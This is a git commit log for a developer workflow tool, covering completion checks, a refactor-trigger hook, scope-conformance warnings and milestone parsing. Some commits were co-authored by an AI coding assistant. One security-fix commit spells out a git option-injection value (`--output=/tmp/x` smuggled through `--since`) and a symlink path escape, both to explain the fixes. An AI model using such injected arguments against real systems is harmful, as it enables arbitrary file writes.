an acceptance criterion that the text be in the tree before implementation
begins, so this lands first, alone, ahead of any code.

Also clears the stale blocked-on-2957 row in the guard roster.

* refactor(#3186): one shared phase-completion predicate, disk-strict

isPhaseComplete in verification.cts becomes the single owner. It calls
readVerificationStatus UNCONDITIONALLY - plan count is not a precondition - so a
zero-plan phase with a passing VERIFICATION.md is complete. That is #3168: init
gated the read on a plan count and synthesized a not_required sentinel, so
phase.complete succeeded while init.manager reported incomplete for the same
phase.

The guard, built and run before scope was fixed per Amendment 3, found 9
re-derivations where the ADR named 3. Four were unnamed, including one in the
prompt layer: mvp-phase.md ORed a ticked checkbox with disk status, which under
disk-strict is the divergence itself.

Per the #2957 decision, a ticked ROADMAP checkbox is a human annotation with no
machine authority. The overrides in roadmap analyze and init manager are deleted
rather than generalized; the user's checkbox stays in ROADMAP.md, only its
authority goes.

scanPhasePlans.completed and buildWorkstreamInventory are deliberately NOT folded
- they answer 'are all plans summarized', which is a different question, and
folding them would either over-report completion or invert the dependency
direction between Phase 1's owner and this one.

Verified on the remote runner.

* fix(#3186): close seven review findings and record the missing-verdict rule

The isolated review reproduced a write-path regression I introduced: migrating
cmdRoadmapUpdatePlanProgress dropped its summaryCount>=planCount gate, so a phase
with a fresh passing verification plus a newly-added unsummarized plan reported
complete AND wrote a checkbox into ROADMAP.md while phase complete refused. The
owner stays right per 7.4 - plan count is not a completion precondition - so the
gate is restored at the write site as an explicit composition, mirroring the
separate 2648 unexecuted-plan gate cmdPhaseComplete already carries.

The spec axis was right that my 0.x-split reasoning was too permissive. The 2957
decision names buildStateFrontmatter as one of the three that must converge, and
buildWorkstreamInventory combined a summaries-met local with verification data to
decide the same verdict - Decision 4(c)'s named bypass, and it reproduced 3168 in
a third surface. Both now route through the owner. The raw scanPhasePlans helper
stays: it answers are-plans-summarized, which genuinely is a different question.

Maintainer decision recorded in 7.4: a missing verdict is not a passing one, so
an absent VERIFICATION.md means not complete everywhere. That retires 2645's
verifier-disabled tolerance and inverts its Goodhart incentive - deleting the
evidence now lowers completion instead of raising it.

Guard hardened: block-form count gates and algebraic restatements are caught, and
the header now discloses its remaining limits instead of overclaiming.

Verified on the remote runner.

* fix(#3186): route state sync through the owner and catch bare completed reads

The matrix found 52 failures. 51 were fixtures asserting the old semantics: a
phase with plans and summaries but no VERIFICATION.md used to count complete and
correctly no longer does. Each fixture now carries a passing verification where
that is what the test was actually about, rather than having its assertion
weakened.

The 52nd was a real 10th re-derivation the guard could not see. cmdStateSync
destructured scanPhasePlans().completed directly - a bare field read, not a
comparison - and used it as a completion verdict, so state sync and state json
disagreed on completed_phases for identical disk state. Routed through the owner.

Guard gains shape (d): any read of .completed off a scanPhasePlans() result
outside plan-scan.cts, in chained, destructured and indirect forms, function
scoped with no line window. It cannot tell a summaries-met read from a completion
read - that is data flow - so it flags every one and requires a written-reason
exemption, which is the same discipline shapes a-c already use. The blind spot is
disclosed in the header rather than overclaimed.

The emitted-attribution failure was also mine, not pre-existing: the mvp-phase.md
checkbox-OR removal moves emitted bytes, acknowledged in tests/emitted-drift-acks.

Verified on the remote runner.

* test(#3186): give the nested-plans sync fixture a passing verification

Last 3 matrix failures were one failure echoing up two describe levels. Phase
01-alpha had plans and summaries but no VERIFICATION.md, so under disk-strict
completed stayed 0 and no Progress change was emitted - correct new behavior, not
a regression.

Added the passing verification rather than dropping the Progress expectation, so
the test still covers what #3257 is about: that a nested plans/ layout is counted
and not undercounted. Probe against the built lib confirms
Progress: 0% -> 50% alongside Total Plans in Phase: 0 -> 3.

* chore(#3186): backfill changeset PR number

pr:0 placeholder replaced with the real number now that #3306 exists.

---------

Co-authored-by: sim <sim@local>
2026-08-10 10:18:29 -04:00
Rezolv
2dbee3ebdd enhance(#2229): add three-way claim disposition (admit/refute/abstain) to /gsd-explore research pass (#2543)
Closes #2229.

Each claim surfaced by /gsd-explore's research pass is dispositioned admit, refute, or abstain, with abstentions routed to a visible ledger instead of being smoothed into confident prose. Refute and abstain are separated by whether the disagreeing source is authoritative for that claim; a strong prior is never authoritative alone.

Two guards ride with it: conflict-abstention, and a tier floor that presents a would-be admit as an abstain when the researcher's resolved tier is the budget tier or cannot be determined.

To make that floor enforceable, resolve-model now emits the effective tier (--pick tier). It was already computed above the resolve_model_ids omit gate but was unreachable from a workflow, which left the floor inert on every non-Claude install - the model id is blank under omit and runtime-substituted where a tier map exists, and the profile defaults to balanced. The tier signal mirrors every resolution step that can change which tier runs, including the model_policy preset, and reports unknown rather than guessing. Output is additive; model, profile and effort are unchanged.

Two residuals are disclosed in the workflow rather than papered over: a raw-model-id model_overrides pin reports unknown and is floored (fails closed), and a model_profile_overrides entry repointing a tier at another tier's model can under-report (fails open, and predates this change).

Admin merge used only to satisfy the missing secondary reviewer on a single-maintainer PR. No CI failure and no conflict were bypassed: 38 checks green, remote runner 32255/32255 on both Node lanes.
2026-08-09 23:05:41 -04:00
Tom Boucher
b901d1e06f feat(#1953): complexity-triggered refactor extension point (execute:post) (#3261)
* test(#1953): failing-first suite for the complexity-triggered refactor hook

60 behavioral cases against src/complexity-trigger.cts, which does not exist yet:
decision-point counting, the comment/literal stripping leak surface, threshold and
jump-delta boundaries at limit-1/limit/limit+1, stable-anchor baseline semantics,
and fs fault injection via mock.method. Two fast-check properties assert that
stripping never manufactures a decision point and that comments and string
literals are score-neutral.

Also registers the refactor-trigger capability manifest (inert until
refactor.trigger_enabled) and regenerates the capability registry and matrix.

Verified RED on the remote runner before any implementation exists.

* feat(#1953): complexity-triggered refactor extension point

Adds the opt-in refactor-trigger capability. After a phase executes, an
execute:post step measures per-function complexity for the files the phase
touched and writes a scoped refactor proposal when a function crosses the
configured threshold or drifts past its recorded anchor.

Design notes worth carrying:

- The signal is computed in-core (decision-point counting over comment- and
  literal-stripped source, Node builtins only) rather than via Memtrace or a
  shelled-out analyzer. The hook fires as a deterministic CLI, not an agent
  with MCP tools, and core takes no external dependencies — this is the only
  option a behavioral test can bind to. The metric sits behind a seam.
- The baseline is a stable anchor, not a rolling value: set on first
  observation, moved only on disposition. A rolling baseline makes the delta
  the single-phase change, so a function creeping +2 per phase never trips a
  delta of 5 and the jump check adds nothing over the absolute threshold.
- Strict mode records an open deviation window in the broken-windows ledger
  rather than declaring its own ship:pre gate. ship.md has no generic ship:pre
  gate dispatch — only two hardcoded branches — so a third gate of any kind
  would be declared and never evaluated.
- The gate clears on the proposal being dispositioned, never on the score
  improving. A blocking complexity number is one an executor can satisfy by
  splitting a coherent function in two.

execute-phase.md gains a generic execute:post step-dispatch contract; it
previously matched only ref.skill == "code-review", so any other step
registered there was declared and never run. The code-review branch is
unchanged.

Full rationale in ADR-1953.

Closes #1953

* fix(#1953): close git option injection and symlink escape in the refactor hook

Three findings from the isolated security review, all fixed inline.

HIGH — changedFilesSince interpolated the --since value into a revision
token placed before the -- separator. A -- only stops PATHSPEC parsing of
arguments after it; git still option-parses what comes before. So
--since '--output=/tmp/x' became --output=/tmp/x..HEAD, which git accepts
as --output=<file> and uses to redirect diff output — an arbitrary write.
Fixed with --end-of-options before the revision range plus a conservative
ref validator. The validator deliberately permits ~ ^ @ { } because those
are legitimate git REVISION syntax (HEAD~1, main@{yesterday}) as distinct
from ref-NAME syntax; --end-of-options is the actual barrier. The doc
comment asserting the trailing -- was sufficient was wrong and is corrected.

MEDIUM — resolveConfinedPath confined by string prefix only, so a symlink
committed inside the repo passed the check (its own path is under cwd) and
readFileSync then followed it outside the root. Now lstat-checks for a
regular file and skips anything else with REFACTOR_FILE_UNREADABLE, so one
bad path skips one file and the run continues.

LOW — the new execute:post dispatch contract showed the gsd_run example
before the rule requiring ref.command be validated first. That prose is
executed by an agent, so textual order is execution order. Reordered.

Refs #1953

* fix(#1953): make the analyzer able to see TypeScript at all

Found by running the shipped analyzer over its own source: it reported
functions=1 for a 940-line module with 24 function forms. A return-type
annotation or a generic parameter list made a function invisible —
`function f(a): number {}` and `function f<T>(a: T): T {}` both detected as
zero. Since gsd-core is written in .cts and the capability declares
.ts/.cts/.mts analyzable, the feature silently found nothing in this repo's
own primary language while reporting success. A safety net that reports
"all clear" because it cannot see is worse than no safety net.

All 98 tests passed over this, because every fixture was plain JS — the
exact failure the test matrix's own "assert against the shape production
uses" warning describes. Adds a TypeScript-shapes suite covering return
types (including unions, generics, object literals and type predicates),
generic parameter lists (constrained and defaulted), export/async/generator
combinations, annotated arrows, class-method modifiers, and optional/
default/rest params — plus the two traps: an overload signature has no body
and must not count, and `a < b && c > d` is a comparison, not a generic.
Detection now reports 24/37/21 functions for the three source files, which
matches a hand count exactly.

Also from review:

- The strict-mode ledger dedup identified entries by parsing a prose
  description string. That is banned by CONTRIBUTING's raw-text-matching
  rule and was a real bug: the "exactly one window per untriaged proposal"
  guarantee rested on prose matching, so rewording a description or editing
  WINDOWS.md by hand silently produced duplicates. Now matches structurally
  on kind + phase + file + line.
- A property test asserted on the stripper's output text. Reframed to
  assert the same invariant through analyzeSource's score.
- nextBaseline's `candidates` parameter has been dead since the anchor
  change; removed from the signature and all call sites.
- Extracted the duplicated require-or-degrade and capability-check
  boilerplate.
- ADR-1953's Implementation bullet still named a `refactor.ship-gate` in
  check-command-router.cts — a leftover from the design cut D6 rejects.
  That file is untouched and no such gate exists. Removed.

Refs #1953

* fix(#1953): keep execute-phase.md under its byte ceiling; un-vacuum the large-file test

Five of the seven remote-runner failures were one cause: the execute:post
dispatch contract, written out inline, grew execute-phase.md 1876 bytes
(93,400 -> 95,276) against a frozen PRE_PHASE6 ceiling of 93,600. A drift-ack
does not clear that — tests/phase6-capstone-conformance.test.cjs and
tests/fix-2285-claude-orchestration-wiring.test.cjs assert the file is
literally under the cap.

The contract now lives in gsd-core/references/loop-hook-dispatch.md, which
already claimed to be the point-agnostic dispatch reference and already
documented ref.skill and ref.agent. It gains the ref.command shape, its
in-context validation rule, the advisory-by-construction statement, and a
note that a point whose workflow hand-rolls one kind is not implementing
this contract. execute-phase.md now defers to it in one line: 145 bytes of
growth, 55 B of headroom under the cap. Better placement than the first cut
— the reference was overstating its coverage, and this makes the claim true
rather than duplicating prose next to it.

Acknowledged by appending to tests/emitted-drift-acks/2930-*.json rather
than a new 1953-*.json: two ack sources may never name the same path, and
that fragment is already the accumulating ack for this file.

Sixth and seventh failures: analyzesLargeFileWithinBounds tripped its own
vacuity guard — the fixture generated ~480 KB against a `> 500000` assert,
so the guard fired and the three assertions after it never ran. The test
has been vacuous since it was written. The matrix row specifies ~1 MB, so
N goes 8000 -> 20000 (1.17 MB, 17% margin) and the guard to > 1_000_000.
Verified by reproducing the exact body against the compiled module: 1168888
bytes, 118 ms, all four assertions hold.

Refs #1953

* fix(#1953): fold the execute:post step deferral into the existing resolve line

The remaining two failures were one test: execute-phase.md carries a SECOND,
tighter assertion than the 93,600 ceiling — `<=93400`, which is exactly its
current size. The file cannot grow by a single byte. My previous fix got it
under 93,600 but not under 93,400, so it still failed. ("H." in the report is
just the parent describe of that same test, not a separate defect.)

Rather than add a paragraph, the deferral now REPLACES the existing hook
resolution line. It read:

  Resolve active step hooks from `EXECUTE_POST_HOOKS_JSON` where
  `kind == "step"` and `ref.skill == "code-review"`.

which is the bug itself written down — only code-review was ever dispatched.
It now reads:

  Dispatch each `kind == "step"` hook per
  @gsd-core/references/loop-hook-dispatch.md. For `code-review`:

The following prose already begins "If no active code-review step hook
exists", so it reads correctly and the code-review handling is untouched.
Net effect on the file is -11 bytes: 93,400 -> 93,389, under the margin
assertion rather than merely under the ceiling.

That also removes the need for a drift-ack: the file shrank, so there is no
growth to acknowledge, and the append to the shared 2930-*.json fragment is
reverted. Leaving it would have shipped a claim of "145 bytes of growth"
that is no longer true, on a file six other issues share.

The test's own comment states the principle this ended up honoring: "the host
loop must stay small — optional-feature detail belongs in the capability
fragment, not the host workflow." Putting the dispatch contract in the
reference rather than inline is that rule, applied.

Refs #1953

* fix(#1953): keep the code-review hook literal the workflow test requires

tests/code-review.test.cjs extracts the <step name="code_review_gate"> block
and asserts it contains `ref.skill == "code-review"` verbatim. The previous
commit replaced the line carrying that literal, so the token vanished and the
test went red — a fair assertion: code-review IS the bespoke branch there and
the workflow should still name it.

Restored inside the same one-line deferral, which now reads:

  Dispatch `kind == "step"` hooks per @gsd-core/references/loop-hook-dispatch.md.
  `ref.skill == "code-review"`:

93,396 bytes — still under the `<=93400` margin assertion and 4 bytes below
the base, so the file continues to shrink rather than grow.

Because three consecutive runs were each reddened by a different assertion on
this one file, this change was verified by sweeping ALL of them at once rather
than one run at a time: every test under tests/ that reads execute-phase.md or
references/loop-hook-dispatch.md was located by resolving its path constants,
and each content/size assertion was evaluated directly against the working
tree — 22 assertions, plus two real executions (gen-section-manifest --check,
and emitted-attribution's full real-tree differential). All pass.

That sweep also confirms the earlier judgement call: the net change to
execute-phase.md is a SHRINK, and the size ratchet only gates growth, so
reverting the append to the shared 2930-*.json ack fragment was correct — an
ack would have been both unnecessary and factually wrong.

Refs #1953

* chore(#1953): backfill changeset pr number to 3261

* docs(#1953): add the missing how-to for acting on a refactor proposal

Reference and explanation shipped (COMMANDS.md, CONFIGURATION.md,
FEATURES.md 159, ADR-1953) but the Diataxis how-to quadrant did not, and
that is the one a user reaches for. CONTRIBUTING's required-docs table is
'new command -> COMMANDS.md + FEATURES.md', so CI was green on a gap.

Enabling this feature is genuinely multi-step and no single page walked it:
turn it on, tune the threshold, understand advisory vs strict, discover
that strict needs a SECOND toggle on a DIFFERENT capability, and know what
to do when a proposal appears. The two-toggle subtlety in particular was a
footnote in a config table; here it is a section with both commands.

Follows the shape of its closest siblings, resolve-edge-coverage-findings
and resolve-prohibition-findings — both 'the loop surfaced a finding, here
is what to do with it'. Includes a reason-code table for the silent cases,
since the analyzer is deliberately quiet in six situations and a user who
expected a proposal needs to tell 'nothing to report' from 'could not look'.

Indexed from docs/README.md beside the other loop how-tos.

Docs-only: exempt from the push gate, no re-verification, pass marker on
2af188b4 untouched.

Refs #1953

* feat(#1953): warn when strict mode is on but nothing will actually block

Closes acceptance criterion 5, which I had wrongly marked satisfied.

refactor.trigger_strict records an untriaged proposal as an open deviation
window, but a ship only STOPS if workflow.windows_enforce is also on — a
toggle owned by the broken-windows capability that this feature neither sets
nor requires. So a user could enable strict, believe ship was gated, and find
out otherwise at ship time.

The split itself stays: requires:["broken-windows"] would force-install the
ledger on advisory users who never enable strict, and a ship:pre gate of our
own would never fire because ship.md has no generic ship:pre gate dispatch.
What was missing was discoverability, so that is what this fixes.

`refactor evaluate` now emits a typed REFACTOR_STRICT_NOT_ENFORCING warning,
naming the exact remediation command, whenever strict is on and either
workflow.windows_enforce is off or broken-windows is unavailable. It fires
only on a run that produced a candidate — with nothing to block on there is
nothing to warn about, and warning every run would be noise.

Reads workflow.windows_enforce through the same resolveConfigKey walk the
router already uses for its own keys rather than a second config reader.
Four tests cover the matrix: strict+enforce-off warns, strict+enforce-on does
not, strict+ledger-absent warns, strict-off never warns.

Also corrects a user-facing message in this same file that told the user to
run `gsd-tools config-set` — the wrong form. docs/CONFIGURATION.md and the
broken-windows capability both use `gsd config-set`, and gsd-tools is invoked
as `node gsd-tools.cjs`, so the bare form may not resolve. The two adjacent
messages in this file now agree.

Refs #1953

---------

Co-authored-by: sim <sim@local>
2026-08-09 19:52:47 -04:00
Tom Boucher
3c2be9be1b fix(#3177): correct the stale Claude Code Agent() dispatch claim in two workflows (#3281)
* test(#3177): failing-first guard for stale Agent() dispatch claim

* fix(#3177): correct stale Claude Code Agent() dispatch claim

* fix(#3177): apply review findings and cover debug.md dispatch

* fix(#3177): fit execute-phase correction under the 93400 byte margin

* docs(#3177): clarify changeset covers both debug dispatches

* chore(#3177): backfill changeset PR number

---------

Co-authored-by: sim <sim@local>
2026-08-09 19:51:48 -04:00
Tom Boucher
a5706bd39d enhance(#2596): validate a wave branch's committed diff stays in its declared scope (#3264)
* test(#2596): failing-first suite for worktree-wave scope conformance

Binds the advisory diff-vs-declared-scope check to behavior before it exists:
the pure coverage predicate, the SUMMARY-artifact exemption and its parity with
the rescue walker, the gauntlet integration (never flips ok, degrades on a git
failure, survives a later block), the manifest normalizer's files_modified
handling, and the --files negative-input matrix on record-agent/create.

Refs #2596

* enhance(#2596): warn when a wave branch commits outside its declared scope

The worktree-wave merge gauntlet validated branch, base, deletions, SUMMARY
rescue and a clean worktree, but never compared a plan branch's actual
committed diff against the files_modified the plan declared — so an executor
that committed outside its brief merged into shared phase state silently.

Adds an advisory scope-conformance check: when the manifest entry carries a
declared scope, the gauntlet diffs HEAD...<branch> and appends one structured
warning per path outside it. It never flips ok and never blocks the merge;
promotion to a hard gate is a separate, disclosed change. With no declared
scope no git subprocess is spent at all.

Refs #2596

* docs(#2596): document the advisory worktree-wave scope-conformance check

Records the optional --files flag on worktree record-agent/create, the
advisory warnings channel cleanup-wave now emits, and its two deliberate
noise limits (SUMMARY-artifact exemption, literal-prefix glob matching).
Wires execute-phase to pass the plan's already-parsed PLAN_FILES.

Refs #2596

* fix(#2596): close review findings on the scope-conformance advisory

- share one path normalizer between the SUMMARY-artifact predicate and the
  scope comparison so the exemption and the check cannot drift
- wire --files into the orchestrator-worktree dispatch, which created a
  worktree but never declared its scope, so the advisory silently did not
  apply on that backend; ADR-1239 requires both adapters share one check
- correct the now-false blockquote claiming the check does not exist yet
- add the fast-check property tests the repo requires for parser logic
- add the record-agent/create parity test that Generative Fix Divergence
  requires for two surfaces implementing one rule

Refs #2596

* fix(#2596): keep execute-phase.md under the frozen pre-phase-6 byte ceiling

The one-sentence note added with the --files flag pushed execute-phase.md to
93708 bytes, past the ADR-857 PRE_PHASE6 cap of 93600 — the tightest of the
three workflow size gates, and a hard cap an acknowledgment cannot clear. It
failed three tests plus the differential attribution check.

Condense the note to a one-line pointer (93543, 57 B of headroom); the full
explanation already lives in docs/CLI-TOOLS.md and the dispatch step. The flag
itself stays in the command, because the orchestrator reads this workflow at
runtime and cannot pick it up from docs/.

Acknowledge the remaining 143 B of growth by appending to the existing
execute-phase.md fragment rather than adding a second one — the ack lint
rejects two sources naming the same path.

Refs #2596

* fix(#2596): make the execute-phase.md edit net-negative, not merely under the cap

The size gate on this file is two assertions, not one: bytes < 93600 AND
bytes <= 93400. The base is exactly 93400, so the file is at its budget and
any growth trips the margin assertion — the previous fix cleared the ceiling
but not that.

Move the --files explanation to per-plan-worktree-gate.md, which already owns
PLAN_FILES and carries no cap, and reclaim the rest from two clauses in the
sentence being edited: the cleanup-wave rules phrasing, and a 'non-zero exit'
the very next sentence already states. execute-phase.md ends at 93392, eight
bytes below base. The flag itself stays in the command — the orchestrator
reads this workflow at runtime and cannot pick it up from docs/.

With no growth left, the acknowledgment is unnecessary and its byte delta was
no longer true, so the shared ack fragment is restored byte-identical to base.

Refs #2596

* docs(#2596): add the how-to for interpreting scope-conformance warnings

The docs for this change were entirely Reference — the flag and the warning
codes — with the task-oriented quadrant empty. Adds the page that answers the
question an operator actually has when the advisory fires: what the two codes
mean, that nothing is blocked so there is no failure to hunt for, how to tell
whether the executor over-reached or the plan under-declared, and the three
ways the check legitimately stays silent so an absence of warnings is not
mistaken for proof of conformance.

Refs #2596

* chore(#2596): backfill changeset pr number to 3264

---------

Co-authored-by: sim <sim@local>
2026-08-09 16:12:57 -04:00
Tom Boucher
b7431a9259 feat(#1956): flag cross-artifact fact drift in the plan drift guard (#3259)
* test(#1956): failing-first contract for cross-artifact fact-drift pass

* feat(#1956): flag cross-artifact fact drift in the plan drift guard

* fix(#1956): correct config-key assertion and bidirectional lifecycle-lag exemption

* docs(#1956): document the cross-artifact axis in the architecture reference

* feat(#1956): decide the phase-status drift axis deterministically

* fix(#1956): scope the progress-table lookup, abstain without a position section, rank deferred

* docs(#1956): backfill changeset pr number

---------

Co-authored-by: sim <sim@local>
2026-08-09 14:23:35 -04:00
Tom Boucher
b421e95434 Merge branch 'next' into fix/3174-quick-verification-status-query 2026-08-08 10:47:06 -04:00
Tom Boucher
342590c70e refactor(#3184): milestone windowing has one owner and a decidable failure signal (#3209)
* test(#3184): failing-first milestone-window single-owner suite

Covers the 50 input classes in the phase test matrix: scope classification
(genuinely-empty vs truncated vs unscoped vs unreadable), the section-end
owner's level boundaries, consumer-output identity per ADR-3180 Decision 4(c),
the milestone.complete refusal with negative proof that no directory moved,
the version-token boundary defect, drift-guard behavior, and three fast-check
properties over document-shaped generators.

Committed alone so the remote runner records the failure before the fix lands.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_015kfkRFNUESoBspUYcAQaT3

* refactor(#3184): milestone windowing routes through one owner

Three copies of the milestone section-end walk lived in roadmap-parser.cts —
two distinct computeSectionEnd function nodes plus an inline third in
getMilestonePhaseFilter's versionOverride branch. computeMilestoneSectionEnd is
now the sole owner and the other two are deleted, not kept in sync by comment.

The whole-repo drift guard found what the epic did not: state.cts held three
more re-derivations of the same vocabulary — two byte-identical milestone
bounding checks carrying a defect neither reported copy has (no boundary after
the version token, so v2.0 matched inside v2.0.1), and a milestone-sectioning
predicate. All three route through the owner now.

A composition-level duplicate appeared inside this change's own first pass:
getMilestonePhaseFilter and cmdMilestoneComplete each re-assembled a window out
of the owner's primitives, and had already diverged on whether to skip a closed
milestone heading. sliceMilestoneWindow is the one composition.

Windows now carry the ADR-3180 SCOPE discriminator, so a truncated window is
distinguishable from a genuinely empty milestone — those were output-identical,
which is the whole failure class. roadmap analyze emits it (#3165), and
milestone complete refuses to archive on anything but COMPLETE rather than
pass-all moving every phase directory on disk (#3166). The pass-all degrade is
preserved where its premise holds: making the filter deny-all would trade a
silent over-inclusive answer for a silent under-inclusive one on the read paths
that count with it.

extractCurrentMilestone keeps its signature — 200+ affected symbols across 41
files and 25 process flows — and is a one-line wrapper over the scoped owner.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_015kfkRFNUESoBspUYcAQaT3

* fix(#3184): fence-aware phase detection and one heading-selection owner

Review fixes from the two orthogonal passes.

The blocker: hasPhaseEntries matched ATX phase headings fence-aware via
tokenizeHeadings but tested the #2199 bullet form against un-stripped markdown,
so a fenced EXAMPLE of the bullet syntax counted as a real phase. A genuinely
empty milestone then classified TRUNCATED and milestone complete refused a
legitimate archive — a false positive in the destructive direction, worse than
the defect this phase set out to fix. Both that path and getMilestonePhaseFilter
own pre-existing bullet scan now run on stripFencedCode, since leaving one meant
the owner file gave two different answers to the same question.

The selection rule — locate, prefer the non-closed heading, else the first — had
been written three more times inside the file whose thesis is single ownership.
selectMilestoneHeading owns it; all three sites route through it. The copies were
behaviorally identical, so this is de-duplication with no observable change,
verified by probing that all three paths select the same heading.

roadmap analyze emitting a scope no consumer read left #3165's actual symptom
alive, so Route 0 in next.md now treats a non-complete scope as scan-failed
rather than as a clean empty scan, and the ADR amendment no longer overstates
what shipped.

Also: the scope refusal moved above the archive-directory create, so a refusal
leaves nothing on disk; the versionOverride comment names all four consumers;
COMMANDS.md documents the new guard beside its sibling.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_015kfkRFNUESoBspUYcAQaT3

* test(#2658): exclude the changelog from the malformed-path scan

The gate walks every emitted .md/.js/.cjs file in an installed tree and asserts
none contains `.claude/.trae/rules` or `.trae/.trae/rules`. CHANGELOG.md ships
into that tree, and its #2658 entry quotes both malformed paths while describing
the fix that removed them — so the release note documenting the fix trips the
fix's own regression test. Red on next before this branch.

The installer is correct: a probe over a real --trae --local install found 621
emitted files, exactly one hit, and it was gsd-core/CHANGELOG.md. The scan scope
was the defect, not the product.

Excluded by exact relative path rather than by loosening the patterns or skipping
all markdown — the emitted agent and command markdown is precisely what #2658 was
about, so the gate stays strong everywhere it matters.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_015kfkRFNUESoBspUYcAQaT3

* test(#3184): regenerate install-tree fixtures for the shared drift scanner

scripts/lib/ ships in the npm package and installer, so extracting the shared
tree-walk into scripts/lib/drift-scan.cjs adds one path to every runtime's
install tree. Regenerated via npm run gen:install-tree; the delta is exactly
that one path per fixture.

The two drift guards themselves do not ship (scripts/lint-*.cjs is excluded),
so only the extracted library moves. This matches the existing
scripts/lib/allowlist-ratchet.cjs precedent, which is likewise a lint-only
helper carried in the shipped tree.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_015kfkRFNUESoBspUYcAQaT3

* fix(#3184): restore the #730 sub-milestone boundary and narrow the refusal

The remote runner caught two regressions this branch introduced. Both were mine,
and neither review pass found them — only running the existing suite did.

The version-token boundary. I replaced locateMilestoneHeadings' \b with
(?![\w.-]), reasoning that v2.0 matching inside v2.0.1 was the same defect #2562
fixed in isMilestoneShippedInRoadmap. It is not the same question. A milestone
state of v8.0 legitimately selects the '## v8.0-B' sub-milestone section over a
closed v8.0-A sibling (#730), and \b is what allows it while the stricter
boundary forbids it — nine tests in roadmap-phase-fallback said so. Reverted to
\b; the state.cts consolidation is now a straight merge with no behavior change,
and the v2.0/v2.0.1 ambiguity is left exactly as it was. The ADR amendment and
the design doc no longer claim otherwise.

The refusal scope. I refused whenever the window was not COMPLETE, but #3166 is
about the TRUNCATED window specifically — the heading is found and the section
closes before the phase region, so pass-all archives everything. UNREADABLE and
UNSCOPED are pre-existing, legitimately handled states, and refusing on them
broke 'handles missing ROADMAP.md gracefully' and three archive tests. Narrowed
to TRUNCATED; docs corrected to match.

One of the new tests was also wrong: its fixture gave the shipped and current
milestones' phases the same numeric id, and the filter matches on that id, so it
could not have distinguished the two windows. Fixture corrected to exercise what
it claims to.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_015kfkRFNUESoBspUYcAQaT3

* fix(#3184): enumerate drift-scan.cjs for uninstall

The installer copies scripts/lib/ wholesale, but uninstall removes an explicit
set — deliberately, so a user's own helpers in that directory survive. The
extracted drift-scan.cjs was copied in and never enumerated, so it outlived
uninstall, left the directory non-empty, and the rmdir that follows failed.

Added to GSD_SCRIPTS_LIB_FILES, following allowlist-ratchet.cjs, which is
likewise a lint-only helper that ships there and is enumerated. Verified with a
real install-then-uninstall into a temp target: scripts/lib/ held exactly the
three GSD files and was gone afterwards.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_015kfkRFNUESoBspUYcAQaT3

* test(#3184): assert install and uninstall agree on scripts/lib and scripts/changeset

Found while shipping this phase, and fixed here rather than noted.

install() copies scripts/lib/ and scripts/changeset/ into the target WHOLESALE —
the comment at the copy site literally says "and any future lib helpers".
uninstall() removes them by hardcoded enumeration, deliberately, so a user's own
helpers in those directories survive. A wholesale writer paired with an
enumerated remover cannot stay in sync by construction: any file added to either
directory ships to every user and is then orphaned in their repo forever, since
it survives uninstall, leaves the directory non-empty, and the rmdir that follows
fails. Nothing reported this. 31,225 tests were green over it.

That is the same divergence class this epic exists to delete, sitting in the
installer, so it gets the same remedy CLAUDE.md prescribes for it: a parity
assertion that fails the moment the two surfaces disagree. The test compares each
directory's real contents against its enumeration and names the offending file
plus the constant to add it to.

Both enumerations are hoisted to module scope and exported, so the test asserts
on the actual arrays rather than pattern-matching the installer's source — no
allow-test-rule annotation needed. Proven non-vacuous both ways: empty diff on
the current tree, correct report when an unenumerated file is injected.

scripts/changeset/ turned out to carry the identical defect and is covered too.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_015kfkRFNUESoBspUYcAQaT3

* chore(#3184): backfill changeset PR number

Also narrows the wording to match the shipped behavior: the refusal fires on a
truncated window specifically, not on any non-complete scope.

Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_015kfkRFNUESoBspUYcAQaT3

---------

Co-authored-by: sim <sim@local>
Co-authored-by: Claude Opus 5 (1M context) <noreply@anthropic.com>
2026-08-08 09:50:35 -04:00
0xdhx
78330e505c fix(#3174): read quick's verification status via the verification.status query
`gsd-core/workflows/quick/steps/quick-verification.md` read the verifier's
result with `grep "^status:" F | cut -d: -f2 | tr -d ' '` and routed it through
a table whose only arms were passed / human_needed / gaps_found. That read
fails two ways. Driven against the old pipeline:

  never written (verifier died)      -> empty        -> no arm
  off-schema value                   -> weird_value  -> no arm
  `status:` in frontmatter AND prose -> two lines    -> no arm
  valid `passed` on a CRLF checkout  -> passed\r     -> no arm
  stale report still reading passed  -> passed       -> SUCCESS
  `status: passed` in the prose only -> passed       -> SUCCESS
  off-schema `passed:bogus`          -> passed       -> SUCCESS

The first four leave the orchestrating agent improvising at the moment the
pipeline failed. The last three are silent false passes: staleness was never
evaluated, the match was not anchored to frontmatter, and `cut -d: -f2` splits
an off-schema value at its own colon. The CRLF row is a pre-existing Windows
bug this change closes as a side effect.

The unanchored match is DEFECT.FRONTMATTER-SCALAR-BROAD-GREP, which the code
side already fixed by name — `readVerificationStatus` parses frontmatter only,
anchored at byte 0, and is total over its input space, returning `missing`,
`unknown` and `stale` sentinels. execute-phase.md, verify-work.md and
progress.md all read this same artifact through that query already; quick was
the remaining second mechanism.

Route quick's read through it and add an explicit terminal arm.

Three details a naive swap misses:

- The step file carries the runtime shim bootstrap itself. Step files are read
  and executed as their own units, so quick.md's bootstrap does not reach here.
  Copied byte-identically from gsd-core/workflows/_runtime-launcher.snippet.sh,
  the source sync-runtime-launcher.cjs generates every workflow's copy from.
  Without it the call resolves to nothing, 2>/dev/null swallows the error, and
  the fix degrades to a permanently-taken recovery arm.

- No jq. `--pick status` returns the bare value. Per #2589 a `| jq -r` pipe
  yields an EMPTY variable with no diagnostic wherever jq is absent — the
